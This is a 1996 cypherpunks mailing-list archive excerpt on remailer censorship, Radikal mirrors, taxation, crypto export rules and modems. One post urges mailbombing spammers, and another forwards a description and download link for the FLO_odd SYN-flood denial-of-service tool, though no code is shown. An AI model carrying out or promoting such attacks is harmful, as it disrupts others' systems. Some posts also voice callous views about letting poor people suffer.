> >political speech - all speech should be protected - but remailer operators
> >are not governments.)

The point here, I think, that we are failing to see is that the 
remailers are run on private machines and bandwidth, when you use a 
remailer you are a guest on someone else property, your mail is using 
their bandwidth etc.
They can determine how they like how they are used, I just hope most 
of us will have the strength of conscience to refrain from using 
remailers which censor or restrict their throughput, I agree that 
spam is a different question but we do have our own way of dealing 
with this, just mailbomb the senders, if they are commercial they are 
likely to leave an address or telephone number on the spam even if 
the email address is anonymized, we have ways ;-) <haha evil nazi 
grin forms on face>

 

  Datacomms Technologies web authoring and data security
     Paul Bradley, Paul@fatmans.demon.co.uk
       Http://www.fatmans.demon.co.uk/crypt/
         "Don`t forget to mount a scratch monkey"

-----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.3ia

mQCNAjH9j+cAAAEEAMBvREiQR0ot9dFCO0TiSCSunAYLv2g1Bc6I3bz8FzKXNH53
6mieJf/W4rD+CxJpT0q9RQaaoRtkHJLwbjfK2il3D7mEahMAyqvF/xRJNqkXfhM3
sRJM0Jh43l+W0M5vwokbEbk25/bxWWGspTsLD3YHbzKnG6pOcL5OPIRbv66xAAUR
tCdQYXVsIEJyYWRsZXkgPHBhdWxAZmF0bWFucy5kZW1vbi5jby51az6JAJUDBRAy
NwfvNkCBjDT0xHEBATQPA/9TORmN/UjNecj03q4anpvdyCLiez5sKuNbnYK50RiP
Jj4QpWWvST3smyQ0A86DrZY/re056MXwQmARESx0rFZxdnD0oORICl5r8dJLIy3b
j8rbA5olXwZwKz73/X5s13v/pvHYX4cIsbVK8NHXqh5llSKt6TBAuGgkIGF29z5k
C4kAlQMFEDI3B9mdtf/umVkv7QEBcRYD/1FBteLqsUmr81euxqqnnrpLlyHb58B/
9sdATuua4uSjX46hXDZ264YozspNrzSB4NEdrmXOWVX3fiE0ga6XkSSkIeF23V90
En37Z0BdbFzgF00FRYTFyTq8eezQrdg/+rBPUsZUmG5wpq3e12FKHQsX01i+1mB2
YmqqwCV5e95eiQCVAgUQMh8uSb5OPIRbv66xAQEqJwP/fxQyiCasjFcbDpsFfsYp
put5cCC/9pOx6X3DlbKShPMpUOS+A9HsTEmJQN8Iawv1nSwPdtc2cR/GhW6ilVjW
LSloGdMVLabm9pGpZZMkRaZlXFUkOv7VhfgsUiL+vIDryBCAwUZCzQiWycjt/cPi
mUqFH41Z7NkyO8ZFdi5GGX0=
=CMZA
-----END PGP PUBLIC KEY BLOCK-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tank <tank@xs4all.nl>
Date: Sun, 15 Sep 1996 05:26:18 +0800
To: tank@xs4all.nl (tank)
Subject: radikal mirrors as of 14-9-1996
Message-ID: <199609141855.UAA07141@xs2.xs4all.nl>
MIME-Version: 1.0
Content-Type: text/plain



** Radikal Mirrors **

************************************************
Receive Radikal 154 by email: 

     Send a empty message to radikal@xs4all.nl
     and you receive issue 154 by mail. 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++
Read the radikal by calling the netherlands (25 numbers).
     All telefonnr. are listed at the end of this mail.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Download the radikal archive:

http: 

     radikal.tar.gz Radikal-site unix archive
     radi.zip Radikal-site dos-zip archive

ftp: 

     ftp://utopia.hacktic.nl/pub/replay/pub/incoming

Radikal 154 in plaintext ASCII 

     http://www.xs4all.nl/~tank/radikal/radi154.tgz Radikal 154 unix 

     http://www.xs4all.nl/~tank/radikal/radi154.zip Radikal 154 dos-zip  

If you got your mirror up and running let us know 

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
     Special mirror: 
     de.soc.zensur 
     de.org.politik.spd 
     http://www.altavista.digital.com usenet-search for radikal.zip
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

Mirror-sites: 
=============
   1.http://burn.ucsd.edu/%7Eats/RADIKAL/ 

   2.http://www.jca.or.jp/~taratta/mirror/radikal/ 

   3.http://www.serve.com/~spg/ 

   4.http://huizen.dds.nl/~radikal 

   5.http://www.canucksoup.net/radikal/index.html 

   6.http://www.ecn.org/radikal 

   7.http://www.well.com/~declan/mirrors/ 

   8.http://www.connix.com/~harry/radikal/index.htm 

   9.http://www.ganesa.com/radikal/ 

  10.http://www.denhaag.org/~radikal 

  11.http://www.knooppunt.be/~daniel/radikal 

  12.http://emma.unm.edu/radikal 

  13.http://www.tacacs.com/radikal/" 

  14.http://www.dsvenlo.nl/~vvd/radikal/ 

  15.http://www.why.net/home/static/radi 

  16.http://users.abcs.com/dockmstr/mirror/radikal/index.htm 

  17.http://www.xs4all.nl/~jeroenw/radikal/ 

  18.http://home.ipr.nl/~radikal/ 

  19.http://www.dreamy.demon.co.uk/occam/ 

  20.http://www.ibmpcug.co.uk/~irdial/live_free/ 

  21.http://zero.tolerance.org/radi/index.htm 

  22.http://www.meaning.com/library/radikal/ 

  23.http://www.xs4all.nl/~irmed/radikal/ 

  24.http://www.walli.uwasa.fi/~tviemero/radikal 

  25.http://www.sko.it/~sfede/radi/index.htm 

  26.http://www.bart.nl/~sz/index.html 

  27.http://bellp.med.yale.edu/index.htm 

  28.http://www.euronet.nl/users/funest/radi/index.htm 

  29.http://fine.com/radikal 

  30.http://www.lab.net/radikal 

  31.http://www.charm.net/~gbarren/radikal 

  32.http://login.datashopper.dk/~pethern/radikal/ 

Phone: Call and login as "new".
So first dail the international number +31 (hollands international code)
and than one of these numbers.

Amsterdam 		Zoetermeer		Maarssen 	
020 5350535, V.34 	079 3611011, V.34	0346 550455, V.34 
020 4223422, UUCP 	079 3600800, ISDN PPP	0346 553613, ISDN PPP
020 6265060, ZyXEL 	079 3630569, ISDN X.75	0346 555285, ISDN X.75 
020 4229700, ISDN PPP 
020 4206782, ISDN X.75 

Hoorn			Geleen			Leeuwarden
0229 212177, V.34 	046 4789478, V.34	058 2157815, V.34 
0229 219717, ISDN PPP	046 4230555, ISDN PPP	058 2130910, ISDN PPP 

Goes			Assen
0113 252900, V.34	0592 331531, V.34
0113 270110, ISDN PPP	0592 331278, ISDN PPP

Willemstad		Deurne
0168 472472, V.34 	0493 323344, V.34 
0168 476472, ISDN PPP	0493 351566, ISDN PPP





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Asgaard <asgaard@Cor.sos.sll.se>
Date: Sun, 15 Sep 1996 05:23:57 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
In-Reply-To: <ae5f0a3c0d021004fdbe@[207.167.93.63]>
Message-ID: <Pine.HPP.3.91.960914190237.14123A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 13 Sep 1996, Timothy C. May wrote:

>The 70% already _are_ cutting the throats of the other 30%. It's called a
>60%+ tax rate. This is the sum of: federal income tax, state income tax,

Most of these taxes are not used for feeding the poor but to support
the Nomenclatura of the Bureaucracy and we all want to get rid of that.
The beauty of a simple tax on production of goods for transfer to a
few necessary institutions is it's simplicity - no need for millions of
clerks to implement the System like now. And the Basic_Needs_Refund
should, as I suggested, be payed to ALL citizens, for ease of
administration. The idea of production tax, as opposed to the present
system of income tax, has been investigated by economic theorists
for years and some of them believe in it. I can't go into details
because my knowledge is lacking and my interest in the academic
subject of economy is moderate, but such taxation seems to fit with
crypto-anarchy in that physical goods in any but the most insignificant
scale can't be hidden by cryptography.

And I rather pay some taxes (but optimally much less than now)
then have my throat literally cut by a revolting 'mob of servants'.

>The masses have realized, as De Tocqueville predicted 150 years ago, that
>they can use the democratic process to pick the pockets of others. This is
>why I have no faith in "democracy," and consider crypto anarchy to be the
>best way to undermine this flawed system.

I agree with most of this. As some kind of an anarchist (but not a
pure anarcho-capitalist) I can of course not accept the basic rule
of democracy: that a majority (big or slight) should be able
to decide for the minority; or decide for the individual in any
but the most obvious ways (imprisoning killers and thieves etc).
But I believe that most people really want to work to some extent,
to be part of the economic process and gain a standing above
the minimal one - hence there is no danger in a Basic-Feed-Refund
system.

>Cf. what sociologists call "the demographic transition." Countries that
>value learning and wealth are _not_ facing a population problem. In fact,
>many such countries are now at "below replacement" birth levels.

And that's good. The world population really should go back to around
1 billion for achieving a stabile ecology (with singing birds for
the peace of minds). The former (?) US system of encouraging young
standalone women to make babies to get benefits was very bad. The
Chinese system - less benefits the more children you have - is the
way to go.

>poor of today are receiving this. Ask a peasant of, say, 18th century
>Europe if he'd consider himself sheltered and fed if he could have an
>apartment in a building, a microwave oven, a television, a MacDonald's
>nearby, and enough extra spending money for some beer.

That's about exactly what I see as a minimal standard. The microwave
oven is the cheapest of ovens. Untaxed beer is the cheapest of drugs.
The television could go, though (but it will never do so in the present
system - it's needed for indoctrination).

>(The point being that people want more than "basic food and shelter," but
>are often unwilling to make the commitments and sacrifices in their lives
>to gain the wherewithal to earn significant salaries.)

This is where we disagree. The real lazy ones are satisfied with a roof
over there heads, a microwave oven for cooking pizza, a six-pack and
a soap opera. Most people really do want to achieve something more in
their lives.

>There is a basic error here, one that I see often. Who says that the
>"anarcho-capitalists" will freely give away, say, some vast fraction of
>their profits so as to subsidize the overall society? Any more so than the

Not a vast portion, if the above_basics capitalistic economy blooms.
Probably 10% would suffice - what was once paid to the church, the
institution that traditionally has supported the ill and poor.

The problem with the 100% market economy approach is what to do
with those who just can't get it together, i.e. who buy beer for the
money that should go to health insurance and then fall ill. It's
against basic human instincts to just let them stay in agony.
A system with only voluntary charities might possibly become enough
when we have reached the resemblence of an ecology-balanced singularity,
but this is not the historical time for suddenly ending ALL welfare -
in a situation with unemployment (not accepting making maids and
servants of those loosing their jobs) mainly due to robotics. 

>And crypto anarchy means it will not be clear who is making what, who is
>generating what income, and where it is located. And the producers of
>wealth will be able to move accounts, resources, and even factories around

It will always be comparatively easy to locate production plants
and farms, and tax them 10% of their production, without even
caring who owns them. This would call for a minimum of government
clerks. Crypto anarchy will inhibit taxation of all other kinds
of businesses, speculations and information transfers - the great
bulk of the present economy.

>Ask your fellow Swedes about the drain of talent out of Sweden in the 60s
>and 70s...the flight of Bergmann, actors and actresses, corporations, and
>even ABBA. (Though I understand most of ABBA moved back to Sweden and is
>now chummy with the Queen.)

This is a myth.
I don't have to ask, I was there! I was happy to get rid of Bergman,
a much overrated director of boring movies. That actors and actresses
left for Hollywood is not surprising, that's where the real movies
are made (good and 'bad'). The Swedish film industry - heavily subsidized
with tax money! - is mostly producing boring movies, with people just
talking, that only intellectual snobs pretend to like. The country
is to small for the accumulation of high-risk investment capital that
real movies need nowadays. The likes of ABBA's and Bjorn Borg (a
tennis player who got very rich) move to tax-friendly places like
Monaco, invest their millions and then come back to live off their
accumulated wealth. Nothing wrong with that. Had there been crypto
anarchy already in the investment markets they could have stayed
all along, of course, but who cares about where they live. And since
you mentioned the Queen of Sweden (born in South America, of
suspicious post WWII German descent): she is presently the front
celebrity for the anti-pedophile movement here - after being shown
some kiddie-porn at an 'official' demonstration.

Seriously... The big Swedish corporations (Volvo, Eriksson, ASEA etc)
have not moved out of the country. Why should they? Swedish wages
and taxes are not very different from anywhere else in the Western
World.

Asgaard




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 15 Sep 1996 12:03:45 +0800
To: jya@pipeline.com (John Young)
Subject: Re: FLO_odd
In-Reply-To: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com>
Message-ID: <199609150203.WAA06409@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



The software in question should come with a warning attached: use it
and go to jail. Its a felony to maliciously disrupt someone's machines.

Perry

John Young writes:
> 2600, Summer, 1996 
>  
> Flood Warning 
>  
> by Jason Fairlane 
>  
>  
> This program scans a host to determine which ports are open,  
> or listening for connections. Once a list of receiving ports  
> has been compiled, the program then floods each of them with 
> the specified number of SYN packets. 
>  
> Don't use this software without permission. I'm serious. It's  
> very very very bad. This is probably one of the worst forms  
> of Denial-Of-Service attacks there is. No one will be able  
> to connect to your target's machine. It's bad. 
>  
> [Code follows.] 
>  
> ----- 
>  
> http://jya.com/floodd.txt  (12 kb) 
>  
> FLO_odd 
>  
>  
> Thanks to XX. 
>  
>  
>  
>  




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 17 Sep 1996 12:41:27 +0800
To: pgut001@cs.auckland.ac.nz
Subject: Re: [Long] A history of Netscape/MSIE problems
In-Reply-To: <84279182110737@cs26.cs.auckland.ac.nz>
Message-ID: <199609142203.XAA00154@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Peter Guttmann <pgut001@cs.auckland.ac.nz> writes:
> >Hadn't heard that before, that the trade secret requirement was
> >imposed on RSADSI.  What was your source for that info, it is an
> >interesting assertion on the part of RSADSI, and I am intrigued.
>
> It's in AC II, p.319 (I was getting worried for a minute, I missed
> it the first time I looked and then couldn't figure out where I'd
> got the info from).

I can't see anything suggesting that the trade secret status of the
algorithm had anything to do with it's being granted special export
status.  All it says on 319 (the section on RC2) is:

: It is proprietary, and its details have not been published...

[of course since then someone did publish, anonymously]

: ...An agreement between the Software Publishers Association (SPA) and
: the US government gave RC2 and RC4 (see Section 17.1) special export
: status (see Section 25.13).

Sameer posted that someone at RSA once told him unofficially that the
trade secret status was required.

Schneier (courtesy of Ulf Moeller <um@c2.net>) seems to be saying that
it has nothing to do with it, in spite of RSADSIs claims:

: Schneier writes (2nd ed., p. 398): "This special export status has
: nothing to do with the secrecy of the algorithm, although RSA Data
: Security, Inc. has hinted for years that it does."

Adam




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 15 Sep 1996 13:37:33 +0800
To: cypherpunks@toad.com
Subject: Uses of Computational Chaos
Message-ID: <01I9HJIYSVKK9ULPY6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	It is reasonably obvious that using _computational_ (as opposed to
physical) chaos won't increase entropy. But how about using it to make an
attacker work harder to use any flaws in your method of generating random
bits? As a simplistic example, say that the scribble window you're using tends
to result in a 1 for each 3rd bit. Nice and simple for an attacker to exploit.
But if that output is then fed into a chaotic system as its starting conditions,
and you then take the state of that system after a sufficient number of
iterations and use it as the basis for the IDEA key or whatever, the attacker
doesn't just have to search through all the IDEA keys with the third bits being
1's - they have to process each of those through the chaotic system and use
those results. Sort of like factoring - checking any two given prime factors
will be rather easy, it's just the sheer number you have to check that makes
things difficult. (This can be thought of as an odd variety of hash,
particularly if you do something like chopping off the most-significant-bit
in the chaotic system's output.)
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 15 Sep 1996 14:00:54 +0800
To: jf_avon@citenet.net
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <01I9HK94QG309ULPY6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jf_avon@citenet.net"  "Jean-Francois Avon" 14-SEP-1996 03:33:52.00
To:	IN%"cypherpunks@toad.com"
CC:	
Subj:	RE: "Remailers can't afford to be choosy"

>If, just for the sake of example, you were truly believing in 
>unregulated capitalism, with all the arguments in the world, and , 
>say for the sake of the example, again, a True Communist (tm) was 
>mailing through your remailer, advocating that they seize your 
>property for the benefit of some unknown, but all deserving stranger. 
>Would any censorship be illegitimate?  In other words, should you 
>work to further the work of the ones who whishes, but their avowed 
>goals, to bring you harm?

	Actually, I already may have helped a radical left organization -
namely Radikal - by putting some mirror sites on a lot of search engines.
Quite simply, capitalism works - and it will win out in an unfettered contest.
It's communism and other varieties of authoritarianism that need the
fetters to win. (In the ultimate extreme, I include gun control under the
fetters that communism/etcetera need to win... the "redistribution" from
producers ("rich") to welfare drones ("poor") during the Rodney King riots
would have been nicely prevented by some shopkeepers with automatic weapons.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. Allen Smith" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sun, 15 Sep 1996 14:06:39 +0800
To: tcmay@got.net
Subject: Re: "Remailers can't afford to be choosy"
Message-ID: <01I9HKVBXEBM9ULPY6@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"tcmay@got.net" 13-SEP-1996 20:33:15.39

>I'm fully aware of the rights of remailers to limit what they pass on. I
>just don't think it wise, nor do I think it fits with pious calls for "free
>speech."

	I've been looking over your original posting... such as at your
comment about situations working out the best when only the parties involved
are involved in rulemaking. I'd agree... and remailer operators are among
the parties involved in these cases. This may be via direct individual pressure
(for remailers without front ends) or through conscience/social pressure (for
remailers with disposable front ends or chaining-only remailers), but they're
still involved.
	To me, there are two different types of filtering that can be done.
There's the filtering of data into their appropriate categories - e.g., a
moderator of a mailing list deciding that something is off-topic _for that
list_, not for any discussion - and filtering of data into stuff that
should be transmitted and shouldn't be transmitted, even though, e.g., it's
on topic for a given mailing list.
	I discourage people from doing the second type of filtering - it's
something that government shouldn't do at all, and that makes in my view the
person doing such filtering responsible for _everything_ that they do let
through (preferably legally responsible). The first type is tricky enough to
tell from the second that I don't want government doing it, but I don't
discourage others from doing so.
	There's also the matter that it will take some improvements to get
to a situation where remailer operators won't have to deal with so much - e.g.,
expiration of some patents so that remailers can take digital cash. It's just
that I don't see pressure such as from spamming through remailers as helping
to get those improvements, all in all. Some of it may - e.g., encouragement of
dropping of inadequately secure remailers like anon.penet.fi (sorry, Julf), as
you mentioned - but this isn't the case for all of it.
	-Allen




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 15 Sep 1996 10:46:52 +0800
To: cypherpunks@toad.com
Subject: FLO_odd
Message-ID: <199609150103.BAA03645@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


2600, Summer, 1996 
 
Flood Warning 
 
by Jason Fairlane 
 
 
This program scans a host to determine which ports are open,  
or listening for connections. Once a list of receiving ports  
has been compiled, the program then floods each of them with 
the specified number of SYN packets. 
 
Don't use this software without permission. I'm serious. It's  
very very very bad. This is probably one of the worst forms  
of Denial-Of-Service attacks there is. No one will be able  
to connect to your target's machine. It's bad. 
 
[Code follows.] 
 
----- 
 
http://jya.com/floodd.txt  (12 kb) 
 
FLO_odd 
 
 
Thanks to XX. 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 16 Sep 1996 00:07:34 +0800
To: cypherpunks@toad.com
Subject: Re: 56 kbps modems
Message-ID: <199609150831.BAA20470@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


>> >U.S. Robotics and Rockwell International are planning new modems with
>> >speeds up to 56 kbps a second, almost double the speed of the fastest
>> >rate now available.  The new devices should be available by the end of
>> >the year, although their top speed initially may be less than 56 kbps.
>> >(Wall Street Journal 12 Sep 96 B11)
>> People who seemed to know used to say that 'the Shannon limit'
>> set an absolute upper limit around 40 kbps. Has Shannon been
>> proven wrong, or what?
>Well, it all depends on the signal-to-noise ratio. Also, if the noise is
>not white gaussian the situation can be even better.

Or it can be worse.  Almost all voice traffic in the US these days,
either once it gets to your local telephone wire center or maybe before,
is carried on T1 digital connections, which use 64kbps digital voice -
it's sampled at 8000 samples/second, A/D converted using a non-linear
8-bit scale called mu-law (or A-law for Europe), and (for the most common
framing format) has a signalling channel stego'd onto the LSB of every 6th byte.
If you knew which the "robbed bit" was, you could get 63 kbps of digital data,
but since you don't, digital signals are limited to 56kbps since they
can't trust any of the low bits (analog doesn't lose much from this.)

Unless they're _really_ talking about ISDN "modems", I'm surprised
to hear somebody saying they can take 56 kbps, turn it into analog,
let the phone company quantize and mu-law the analog into 64kbps,
and still get the original 56kbps back out.  But if they can, well,
yee-hah, ISDN is nearly dead :-)  (Not totally dead; the signalling is
still useful for some applications, the convenience of two channels on
one wire pair is nice, and the fact that people can get 56kbps without
the phone company's help will pressure them into offering ISDN for
a lower price in areas where the Phone Company's idea of "all the market 
will bear" is substantially higher than voice pricing.)

(For Norm Hardy's comment on PBXs, the main transparent approach to that
is to use ISDN as the interface.  PBXs often use ISDN to reach either
local or long-distance phone companies, since they generally want more
than vanilla signalling anyway.)

#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 16 Sep 1996 00:08:15 +0800
To: robert@precipice.v-site.net
Subject: HipCrime as MetaSPAM
Message-ID: <199609150910.CAA20840@dfw-ix6.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


The Hippie Of Crime <robert@precipice.v-site.net> suggests that
anybody who puts a mailto: with their name on it is inviting mail,
so what he did shouldn't be construed as rude.  He also asked that
remailer operators not block HipCrime SPAM deliveries and all
mail to HipCrime because people might be interested in his
cool fractals and Java neural net lotto-predicters and anarchist pages.
I disagree, on various points.

1) There's a Robot Exclusion Standard, which uses a robots.txt file
as a convention for websites to inform webcrawling programs 
of sections of their directories they don't want crawled through.
The HipCrime Email Robot appears to ignore this convention -
I don't have a Java Decompiler on my Wimpy Win3.1 system,
but the strings program doesn't show the string robots.txt
anywhere in the bytecodes, which I assume means it ain't there.

2) If a mailto: on a web page is an offer to human readers to send mail
to a human or bot that handles mail relevant to some topic on the page,
that doesn't mean the author invited mail except as described in the
human-readable-language on the page, which may say which addresses
are invitations to send mail on what topic.  Furthermore, the author
may not be the recipient of the mail anyway; 
The Hippie Of Crime Lives Here

3) An invitation to a reader to send mail from the reader isn't 
an invitation to send a large number of identical mail messages.
A spam-generator like the Hippie Of Crime posted isn't designed
to add comments from the reader of the MetaSpamEmailRobot page,
it's designed to get many other people to send HippieSPAMs from the 
Hippie Of Crime.

4) This isn't the first time he's done this sort of thing.
I took a look at the www.hipcrime.com pages, and aside from the
Annoying Frames and Highly Annoying Evil META REFRESH auto-flipping pages,
and Annoying Animated GIFs, there were some really cool-looking fractals, 
and a saga about how a few years ago he was faxing fractals out to a 
few hundred people who he'd put on a fax-mailing list, many without asking them.
        ======================================================================
        Free FAX Fractals

        Free-FAX-Fractals was a long running FAX prank/art project, 
        using facsimile machines to invade office spaces with monochrome
        mathematical psychedelia. During 1992 and 1993, a list of over 500 
        fax numbers was compiled while roaming around San Francisco.
        These numbers were taken mostly from signs and business cards, 
        but many people volunteered their numbers hoping to receive
        trippy fractal faxes on a weekly basis. 
        ===========rest-of-saga omitted================================
Only a couple people actually complained, and the police _asked_ to
get added to the list.

5) "Anarchist Info" - sigh.  Where do people get the idea that publishing
recipes for drugs and explosives is anarchist info?  He didn't talk 
about anarchy, or getting along without governments, or getting rid of them.
Also, he neglects to note that you can simply _buy_ potassium chlorate,
rather than having to (dangerously) boil down bleach and potassium chloride
to make the stuff.  Don't try this crap at home, kids, and please don't
blame the anarchists for it.

Just a Hippie Of Crime, not a Hippie Of Clue.


#			Thanks;  Bill
# Bill Stewart, +1-415-442-2215 stewarts@ix.netcom.com
# <A HREF="http://idiom.com/~wcs"> 	
# You can get PGP software outside the US at ftp.ox.ac.uk/pub/crypto





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 15 Sep 1996 13:06:34 +0800
To: perry@piermont.com
Subject: Re: FLO_odd
Message-ID: <199609150315.DAA13440@pipe2.t2.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


On Sep 14, 1996 22:03:28, '"Perry E. Metzger" <perry@piermont.com>' wrote: 
 
 
>The software in question should come with a warning attached: use it and
go to  
>jail. Its a felony to maliciously disrupt someone's machines. 
 
---------- 
 
 
Heed Perry: here's the author's warning at the commencement of code: 
 
 
/* !!THIS PROGRAM IS EXTREMELY DANGEROUS!!  NO GUIDELINES 
 * ARE PROVIDED FOR THE CODE CONTAINED HEREIN.  IT IS MERELY 
 * A DEMONSTRATION OF THE POSSIBLE DESTRUCTIVE USE OF IP 
 * SPOOFING TECHNIQUES.  THE AUTHOR CLAIMS NO RESPONSIBILITY 
 * FOR ITS USE OR MISUSE.  - JF (3/8/96) 
 */ 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 08:49:23 +0800
To: cypherpunks@toad.com
Subject: Re: Workers Paradise. /Political rant.
Message-ID: <ae61bb3e00021004ed98@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain


At 7:08 PM 9/14/96, Asgaard wrote:

>The problem with the 100% market economy approach is what to do
>with those who just can't get it together, i.e. who buy beer for the
>money that should go to health insurance and then fall ill. It's
>against basic human instincts to just let them stay in agony.

I have no problem with letting them stay in agony (but you all knew this).

"Saving for a rainy day," whether saving, investing, getting an education
(while others are out partying), preparing, etc., all takes effort and
commitment. If those who save and prepare are then told they have to pay
high taxes to support those who partied....well, the predictable effect is
that many of them will say "I'll just party and let The System take care of
me." Thus, the effect of "not letting them stay in agony" is _more_ people
in agony. When you tell people that a compassionate society will meet their
basic needs, a predictable fraction of them will choose not to work hard
and prepare themselves.

I say we need to let about 20 million Americans, and a couple of billion in
the rest of the world, meet their fate.

While I will not _actively_ seek to dispose of them, I will work to make
sure they cannot continue to subsidize their lives at my expense.

Crypto Anarchy means getting rid of deadwood the old-fashioned way.

--Tim May

We got computers, we're tapping phone lines, I know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^1,257,787-1 | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "James A. Donald" <jamesd@echeque.com>
Date: Mon, 16 Sep 1996 14:53:33 +0800
To: Hallam-Baker <cypherpunks@toad.com
Subject: Re: Kiddie porn on the Internet
Message-ID: <199609160429.VAA19187@dns2.noc.best.net>
MIME-Version: 1.0
Content-Type: text/plain


[Allegations that "save the children" is a political organization 
providing cover for an effort to ban cryptography]

At 01:54 PM 9/9/96 -0400, Hallam-Baker wrote:
> Their main mission is sending food to Ethiopia and other famine
> areas, development work etc. It is ultra-worthy stuff.

Not everyone who sends food to the starving children is ultra
respectable.

Problem is that the usual cause of starving children is tyranny.  
In order to get close enough to the starving children to take 
those cute fund raising photographs you have to pay off and get 
cosy with tyrants.  This creates a moral hazard, in that it is 
hard to tell the difference between normal bribery needed to do 
anything in a tyrannical state, and bribery to bribe tyrants to 
create starving children for photo ops.

It is very common for international charities to develop excessively 
friendly relationships with murderous tyrannies,

Monsters do not generally sport horns and a tail.  More commonly
they walk around on two legs with large neon halos prominently
displayed.
 ---------------------------------------------------------------------
              				|  
We have the right to defend ourselves	|   http://www.jim.com/jamesd/
and our property, because of the kind	|  
of animals that we are. True law	|   James A. Donald
derives from this right, not from the	|  
arbitrary power of the state.		|   jamesd@echeque.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Ray <liberty@gate.net>
Date: Mon, 16 Sep 1996 00:28:17 +0800
To: EALLENSMITH@ocelot.Rutgers.EDU
Subject: [Noise] Shopkeepers Preventing Riot Redistribution
Message-ID: <199609151328.JAA16180@osceola.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Mime-Version: 1.0
Content-Type: text/plain
Content-Transfer-Encoding: 7bit

To: EALLENSMITH@ocelot.Rutgers.EDU, cypherpunks@toad.com
Date: Sun Sep 15 09:26:45 1996
EALLENSMITH@ocelot.Rutgers.EDU wrote:

...

>... the "redistribution" from
> producers ("rich") to welfare drones ("poor") during the Rodney King
>  riots
> would have been nicely prevented by some shopkeepers with automatic
>  weapons.

Indeed, it was. In a beautiful-to-me scene which Miami's WSVN, Channel 7 
(our big-hair station) called "chilling," Korean-American shopkeepers, 
perched atop their building with semi-automatic firearms, kept one block 
safe while the rest of the neighborhood burned without police protection. 
Upon being informed that this was a biased interpretation of legitimate 
actions by the merchants, which _I_ found heartwarming, they said that 
chilling was "just a word." 
JMR  -- "'Media bias' is just 2 words."


Regards, Jim Ray -- DNRC Minister of Encryption Advocacy

"As govt.s grow arithmetically, corruption grows exponentially."
 -- Ray's Law of official corruption.

 Defeat the Duopoly!             Stop the Browne out.
 Harry Browne for President. Jo Jorgensen for Vice-president.
 http://www.HarryBrowne96.org/   http://www.twr.com/stbo
___________________________________________________________________
PGP id.E9BD6D35 51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8
I will generate a new (and bigger) PGP key-pair on election night.
<mailto:liberty@gate.net> http://www.shopmiami.com/prs/jimray
___________________________________________________________________

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjwEGm1lp8bpvW01AQExZQQAm6mj+Oi+4+sd72j79f+S3vYxy2rKY6TR
OTwDChBPe9pgswg1wAR7uRVwXN1UlsB2NqHTsQhuU9/D+Te9ncZdpqowoyVZRqUG
/1NSA8NA9WMOEjW0OoyXCw6EIYOxBvwDqTpxokF4RfLBlVzyYVJVnvnSXMDzkJ4O
gh922BlaqRg=
=DLRS
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Mon, 16 Sep 1996 12:06:58 +0800
To: cypherpunks@toad.com
